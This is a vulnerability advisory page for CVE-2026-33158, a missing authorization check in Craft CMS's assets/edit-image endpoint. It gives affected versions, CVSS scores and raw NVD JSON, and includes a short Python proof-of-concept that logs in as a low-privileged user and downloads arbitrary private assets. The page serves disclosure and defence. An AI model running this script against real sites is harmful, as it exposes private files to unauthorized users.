Security Vulnerability Report
中文
CVE-2026-33158 CVSS 6.5 MEDIUM

CVE-2026-33158

Published: 2026-03-24 18:16:10
Last Modified: 2026-03-26 17:08:28
Source: [email protected]

Description

Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.8 and from version 5.0.0-RC1 to before version 5.9.14, a low-privileged authenticated user can read private asset content by calling assets/edit-image with an arbitrary assetId that they are not authorized to view. The endpoint returns image bytes (or a preview redirect) without enforcing a per-asset view authorization check, leading to potential unauthorized disclosure of private files. This issue has been patched in versions 4.17.8 and 5.9.14.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:* - VULNERABLE
Craft CMS 4.0.0-RC1 至 4.17.8 之前
Craft CMS 5.0.0-RC1 至 5.9.14 之前

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Configuration target_url = "http://target-craft-cms.com" username = "low_priv_user" password = "user_password" def exploit(): # Create a session to handle cookies session = requests.Session() # 1. Authenticate as a low-privileged user # Note: Login endpoint may vary depending on Craft CMS configuration login_data = { "loginName": username, "password": password } print("[*] Attempting to login...") login_resp = session.post(f"{target_url}/login", data=login_data) if login_resp.status_code != 200: print("[-] Login failed.") return print("[+] Login successful.") # 2. Exploit the vulnerability by requesting an arbitrary assetId # The asset ID to target (e.g., a private file belonging to an admin) target_asset_id = "123" # Vulnerable endpoint exploit_endpoint = f"{target_url}/admin/assets/edit-image" params = { "assetId": target_asset_id } print(f"[*] Sending request to retrieve assetId: {target_asset_id}") response = session.get(exploit_endpoint, params=params) # 3. Check response if response.status_code == 200: # The endpoint returns image bytes or a redirect content_type = response.headers.get('Content-Type') print(f"[+] Request successful! Content-Type: {content_type}") # Save the retrieved asset with open(f"stolen_asset_{target_asset_id}.bin", "wb") as f: f.write(response.content) print(f"[+] Saved retrieved content to stolen_asset_{target_asset_id}.bin") else: print(f"[-] Failed to retrieve asset. Status code: {response.status_code}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33158", "sourceIdentifier": "[email protected]", "published": "2026-03-24T18:16:09.750", "lastModified": "2026-03-26T17:08:28.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.8 and from version 5.0.0-RC1 to before version 5.9.14, a low-privileged authenticated user can read private asset content by calling assets/edit-image with an arbitrary assetId that they are not authorized to view. The endpoint returns image bytes (or a preview redirect) without enforcing a per-asset view authorization check, leading to potential unauthorized disclosure of private files. This issue has been patched in versions 4.17.8 and 5.9.14."}, {"lang": "es", "value": "Craft CMS es un sistema de gestión de contenido (CMS). Desde la versión 4.0.0-RC1 hasta antes de la versión 4.17.8 y desde la versión 5.0.0-RC1 hasta antes de la versión 5.9.14, un usuario autenticado con bajos privilegios puede leer contenido de activos privados llamando a assets/edit-image con un assetId arbitrario que no está autorizado a ver. El endpoint devuelve bytes de imagen (o una redirección de vista previa) sin aplicar una verificación de autorización de vista por activo, lo que lleva a una posible divulgación no autorizada de archivos privados. Este problema ha sido parcheado en las versiones 4.17.8 y 5.9.14."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartExcluding": "4.0.0", "versionEndExcluding": "4.17.8", "matchCriteriaId": "6D076F04-8397-4ED0-8428-6D04B786A0A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartExcluding": "5.0.0", "versionEndExcluding": "5.9.14", "matchCriteriaId": "7ADCA708-F32E-4943-B523-CF5029C48A50"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "610F6DE9-720F-45B3-81D5-18E7F6B090FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "CC2F40FC-7C27-456A-B16D-679410D1D5CF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "FBAA8227-04F8-404C-907B-B0162B325F5A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "21B28E2C-327A-4CE6-ACAD-97E459712A55"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "1C7461CF-35AB-48E1-88B6-956DAE1D2AB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "8D8E02D1-601A-4E2B-B619-4775BFDB ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.